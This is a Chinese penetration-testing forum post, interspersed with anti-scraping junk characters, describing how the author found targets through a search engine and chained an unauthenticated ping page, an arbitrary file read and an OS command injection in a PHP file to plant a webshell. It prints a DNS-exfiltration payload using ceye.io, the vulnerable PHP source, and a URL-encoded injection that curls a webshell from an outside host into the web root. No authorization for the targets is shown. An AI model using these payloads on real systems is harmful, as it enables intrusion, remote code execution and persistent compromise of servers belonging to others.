中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]
作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、" {/ W2 N3 S2 ^3 `$ Y& X, i
** **寻找突破口**' i* C0 N0 g- D1 X+ y1 W  e1 K
) Y! p2 Q& @. L, D
**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**5 `1 J- x: g6 X% g% _1 w, ?
* t6 n! d3 ~0 q( c7 }+ K2 y6 m
![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")1 P, w0 [4 f% u& I  I! s2 F  C
2 ?3 E8 _0 i! T" J1 @
) @2 G' h4 D& K6 u

, s2 v5 d0 P9 G5 Q/ n8 Z4 h  g**发现reporter和[Technology,
: W8 ]+ L2 F6 T- W# [Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**% B+ [8 U5 w: e
! ]& R5 a* m! |' n" C
**地址为:**- l& u+ A* ], l2 g
8 N2 O4 @  W, E/ l  K9 h
[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**,如图:**
& a$ @, `0 W7 }" ?, {- M9 t0 f: ?( g" [0 F, g. [6 b
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")+ L- C8 E: h  U* c  ~( w( x
# L! ]& Y* O& Y6 w3 x4 |" w
; F7 s! u5 X! A7 A" C

. }$ K/ o3 S; x6 `4 q  a# |**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**1 c& M! _# a' w3 K6 F% M0 d! c: K1 ?! G
0 }1 e; c# u* p# y6 Z- p, v3 a8 U
**`whoami`.1111.ceye.io** **,如图:**2 X, g4 U5 }" J( p; V" v

7 l- K/ |9 I3 k+ x![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
  @) U! _/ Z( z  y8 Q4 m/ g3 L$ \# }4 e  L2 o" l- }; h

, v/ P* e( b, _, i4 T2 T0 t7 Z; |3 F9 {+ V# b' X, f; O
**返回dns记录如图:**
$ I6 b  Z$ }0 [% x6 M/ `) ]4 F/ m
# W* T" C% R* e0 s0 P![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")& W, r. a& n- z

6 _5 V9 D' w( C! ]% A
1 M7 D  x5 d0 V$ s& M: ~" G- V! H% v  A. O' q3 Y
**发现当前用户权限为root**
" O1 U) T. R' k% n- s
: [8 J4 p. b" K! c' `, b7 u( W+ [**一、
/ V1 F; ~2 w! B! r4 a9 o$ N  P7 n** **通过漏洞组合getwebshell**3 M0 ^& L  S8 }8 X

, e( B6 O' K% q6 g$ E**    ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**. p$ B: S9 A8 L! G/ G( ^, O
. y8 I+ Q% Y+ ?* I. r* Y( n
![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")4 }) W% g% b: G8 s6 ~/ o8 E
% C+ F+ o  V9 x/ q/ W! Q2 m
) S0 E  D$ ^1 D% t( [
+ u! ?( X- x2 x9 a, Z
**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**8 c) w/ x5 h4 y) G" g7 s" a- G

$ I4 a& V' p0 b8 P8 _0 n3 k% B0 N**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**0 |  x! F0 p% g7 Y# J' [! \6 _  y1 @$ [

+ J7 j% W7 X* t' I5 v; I! T![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
% G4 Y  l, I" Y1 n! O& Y* K: a! \- ]  X7 o, _
**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**6 K3 |+ M5 `3 M) t" @$ C( F
7 v; N1 d6 ~. O
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\
- o4 G7 V% \' o* p2 |7 |
, x% L) n/ Y' [; L& z) l1 `1 R7 [6 G9 l3 ?( U# ^4 H/ k- N
**源代码为:**2 U6 \) @  C" l5 n- l
# T* z0 W/ S* f4 K& B
<?php
3 l& w: t" g. r9 Rinclude_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
6 a! c: ]5 G7 b! d- x) f# |1 _?>0 L+ \6 Z3 W  w) V6 A" D

0 `: S- ~  A$ Y3 K' I" V# F<?php/ p# Z$ S. N9 I9 k* C% L
) t4 X7 Z5 J! Y) J
2 s' q( L( {: N. T; j% h

( j3 Q- }, Q$ Bsession_start ();
3 }' H9 I# |$ @) X
* ?6 O+ [/ f3 {8 ?
5 w/ d* @& s4 k- @0 q9 [# Q( \0 o4 l" C
: w0 L" G! ~# G; _2 w* f% Z) D/ f

' Z$ C+ ]: B$ _8 V2 M* T1 _8 I5 h# j2 Q; }
1 P6 Z4 J  D/ z" S1 P
if ($_GET ["objClass"] == "")1 E4 q: ^* A8 \

; s# F) m0 g9 L& s% @, a
5 w1 h3 V! ^( \5 d/ r
1 v) n7 p1 ?, K( W6 z+ e      exit ();, ]/ X( M9 ^: a- ?9 A
5 X* v7 A0 n. ?- h( j
0 V( o- l  A1 v) l1 v# j" L2 w
" x  t& w0 S; E7 q& z7 E
$param = $_REQUEST;
: d7 G, `: e7 y4 d7 e! X) W- t
0 I- T, z6 Z. u4 Q  X8 e& b, {8 f& _9 E7 r
* y( z3 ~+ c6 b) i
% A& g3 {/ A6 E, C4 O3 K9 |' f( {
' n9 {. v7 R; f$ m( x. V0 F
" K% O- ~8 ~, _4 l
" U. m$ E( a9 k" S: F7 H8 O
//echo "\n--------------------------\n";
; f  o5 B# N. U: s6 x1 g: U
; |: z$ R1 k! n; g* l
. N' J8 l# S& S! {5 O& j* t$ w. O, v
% V1 H5 {- B7 ?  {6 O//print_r($param);
# ^# |" f1 H6 Q! b: z& k) _# l/ t$ V6 W4 g

+ Y1 ?: ]+ @7 H- H6 n* ^$ a3 L) v) k8 s" Q  `: @0 Z* f# ~1 Q' Z
//echo "\n--------------------------\n";
, S4 q) N4 u' H; N, D2 n9 I# P3 V! l0 P8 j
3 w% G; o+ i4 \3 Z
4 }0 `7 p6 O$ U; M2 ]& a
[if ($_GET ["method"] ==- H- `' a/ I* x& W
"getList" || $_GET ["method"] == "import" ||6 C% x0 a8 C$ T# w( a' H
$_GET ["method"] == "processAlarm") ](){
  L6 Z1 r/ |9 t) Z; `
) C& @8 M# o2 b( M
6 J# |! Z, a- ~$ e9 {+ V7 k- v9 u! V7 J6 G' m# c  m3 I6 E
      $param( y0 b- \9 W- m, h2 l
["user"] = $_SESSION ["s_userName"];/ k' S% D2 ~) U& t
$ h: e) D  q8 y5 O/ W4 c) s$ S, Y! ]/ `% j

; Y0 ^$ }, T4 F/ g% r' B5 v3 V
9 w7 u/ f: N' [0 f8 `7 H' S3 j( t( w      $param: u3 \; A* f" `# j4 k
["lan"] = $_SESSION ["lan"];& A9 u+ u, l) L

: ~& n4 S5 p7 z3 }/ @% \% i9 y2 ^) S% v% W5 [, [% K" {( |) a
- J  p( B0 k4 z- ?* [5 I5 G
      $param* I% q$ `& X. e! O
["regUserpath"] = $_SESSION ["regUserpath"];
2 @3 L* p5 C/ Z5 x: _" E3 ?
0 v" j! \$ n, c) ]- W0 e0 q
+ W8 H, m6 W% N: x/ m/ _
* w, ~8 p! O) J! r; c4 ]# s   
* z% c; u, e6 L% u
9 d* ?8 }! C4 F3 f! @7 \1 n* N3 C- H4 C

* N( `" q; x* o3 c/ Z5 T; y      exec ($ J( S9 a6 C2 c
"rm -rf /tmp/cache" );  Z/ h8 V1 I" ^2 H/ b
0 R* u) y  M6 ~

: s2 _, m' n6 J6 Z$ r8 C8 A; N  f& U8 t# W: _6 M+ m9 }; _
      [$cmd = "/usr/local/php/bin/php ".$_SERVER
. S6 }# J0 F1 e' i* S4 Y["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()/ g! r1 M. w: i5 L3 W
- N. U0 C  H9 B  R
: }4 d* B0 O; a9 u- d3 D7 X! H
% c- J, C6 _: ]8 M
      $cmd .=
# x: a1 \. {' p! U" " . $_GET ["objClass"];8 t+ @$ V: C( c5 I  p" z2 J# b2 \

2 `2 c* r% X) s- {( \% A& ]- ~+ u: t  f3 J$ k+ W% K

2 J, |' o  Z6 z0 H! \! T8 f3 n      $cmd .=
; o! X6 V/ S9 h7 d" " . $_GET ["method"];! X5 S* I" m* F) v  m6 {

8 _- n# D# K3 K, d
* Q2 k) M& a& y# w7 L7 i- L; @# J. v+ A
      $cmd .=
& g; r7 z1 M; C  T6 z  s( H" " . base64_encode ( json_encode ( $param ) );
) h+ x$ q- A: e( x0 ~
2 s4 F4 w: J- L( P) L4 T
! l" g4 K% j* R' B
3 h2 C/ ?! I3 _/ K0 [, r% t! ~      [file_put_contents("/tmp/query_cmd",$cmd);]()
. H- k# Y+ Z. e' u, j/ A
$ `+ ?/ l0 g( }/ m, M4 s! t. l1 X
1 p) }  f5 L8 l; p) u8 x% W3 L; T( P. J' n7 X8 h
      exec ( $cmd . "
, y2 \+ }* s% r: z9 `5 D> /dev/null &" );
9 N9 Q0 B) d' c! G) w6 a7 t% v' W/ g$ E7 X& z) h& A6 E& s+ D

$ f3 O  i7 @; L8 n
, c) {/ S, y; b1 x5 n  |3 Y' a- l* L; m

; O# L( N( A, C4 J* n& ?; q% u} else {
9 _. Z5 l- l* w" m6 A& k* K  {. z1 e: e. T- k* F) k: W

' B, k. m& ~7 W
0 D. k1 `: |+ v      require_once9 i  E. ^2 E  }; p8 X/ f
($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");/ u& g8 U; X% M

$ d* ?0 w- O2 x' }' c) D/ L4 N$ P3 M4 W

- Z, r$ Y4 j8 l+ n+ I, K: ~4 N1 W      $obj = new3 n% `6 ~+ T# ]& o* @
QueryInterface ();
2 M( F) A; B$ \9 O" c1 y' k6 i7 m6 ?) j2 g$ [
8 Y! C* b+ t/ Q7 `% n: V- S

  E. D5 b# b$ E; z* y. R- i! ?      $instance =
$ a/ q! o# s- T. V" u$obj->getInstance ();9 x1 P: x$ Q+ A/ e3 S7 D
9 C7 a3 Q9 i/ X; D$ E. i
( Q4 d' o9 F& {5 q6 R1 W
  z. R. x2 b4 D9 R& S+ ^/ {
      $instance->invokeMethod/ f; T! r( Y/ H' X( M. V; r
( $_GET ["objClass"], $_GET ["method"], $param );1 c. H0 L! o' p3 _) ~
' Q" C1 ?( c4 y: o  q! g& k
# m3 b% C# d: P( q3 T% h
7 N1 H' A9 t7 X& c
}
7 n( Z( l% _; p6 ^& _1 X7 {/ j. k2 |# W( p" s2 W* E

, G) ^2 b9 v+ K# R. @4 {! C! N' [
exit ();
8 J6 b) [, V9 m, m2 N  O9 \1 }& k  U) _$ [9 [2 t, u; r
$ V* H) `6 i4 Z- H) l
. m5 ^8 }4 H7 E2 x
?>
8 v% h. c+ W% s: [( Y3 p% i
; Z9 H, _9 ~: ^! d**经常简单审计发现if ($_GET* m. D, B7 M' d8 _
["method"] == "getList" || $_GET ["method"] ==
9 W: Q/ ?+ {4 G' r( e3 C"import" || $_GET ["method"] == "[processAlarm]()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =7 J( `0 E7 H0 x
"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .6 |" d  p/ D# a3 i, z+ H
"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**
6 {5 w! O( F  u- i
; f0 r# g6 ^" d**      exec ( $cmd
6 Y, k/ `. {# R* j3 |' G. "  > /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**9 l# o$ t6 l& e
, b$ t7 H% c  Y) F1 B

5 h/ z: h& e9 N/ J2 K1 W![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")7 _& ?7 |, u4 H; H0 _6 j! T! }

2 g4 N1 H7 _, I5 X* X6 E$ |) z5 I; V  {- x2 t

- c; V; `: q, y+ _( V2 `) z6 L**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**, s! O$ {/ @0 e' q) l
& R8 Z4 t7 O  Y/ w
**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**' F: z: j, _" J; t  d* r
* L* j/ @0 |$ x. \" d4 m
**我们用url解码如下:**
* ]: Q6 D) R# ]  F: V: Y0 K, d  R% D/ r2 Z; a6 ]
**|curl http://1.1.1.1/qYCwxRz1.zip -o. |6 n3 D. n/ ^0 r- E! m
/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o
' c3 Q, R( K# U4 P/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php)
* A% G+ |8 y) W$ [9 C- g( D. x# G, D3 J% c
**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**
/ l3 g4 E4 k6 w6 [( O; k& \8 V/ S6 u# u

# ^% ?9 Y. X1 u/ u![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
! O  E5 z% p6 Y$ W: \8 \9 {
6 |" x6 N9 z" f2 m" B% z' B
3 n9 k7 B# T, R- A1 ?1 P, g9 h% D: \) U4 F
. B  p/ X1 e, f' _1 k+ b
**三、总结**
3 Z2 Y: i3 K. E/ |7 h/ M2 c: h8 v4 y& X! n, W% }) Y" A* o
**   ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。**
- B6 ~) Q1 s! W; j" |2 J) |  Z% k% I0 r/ \4 Z+ N
**   ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **8 ~3 p! p( e- F; z; ~* d
[/md]



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2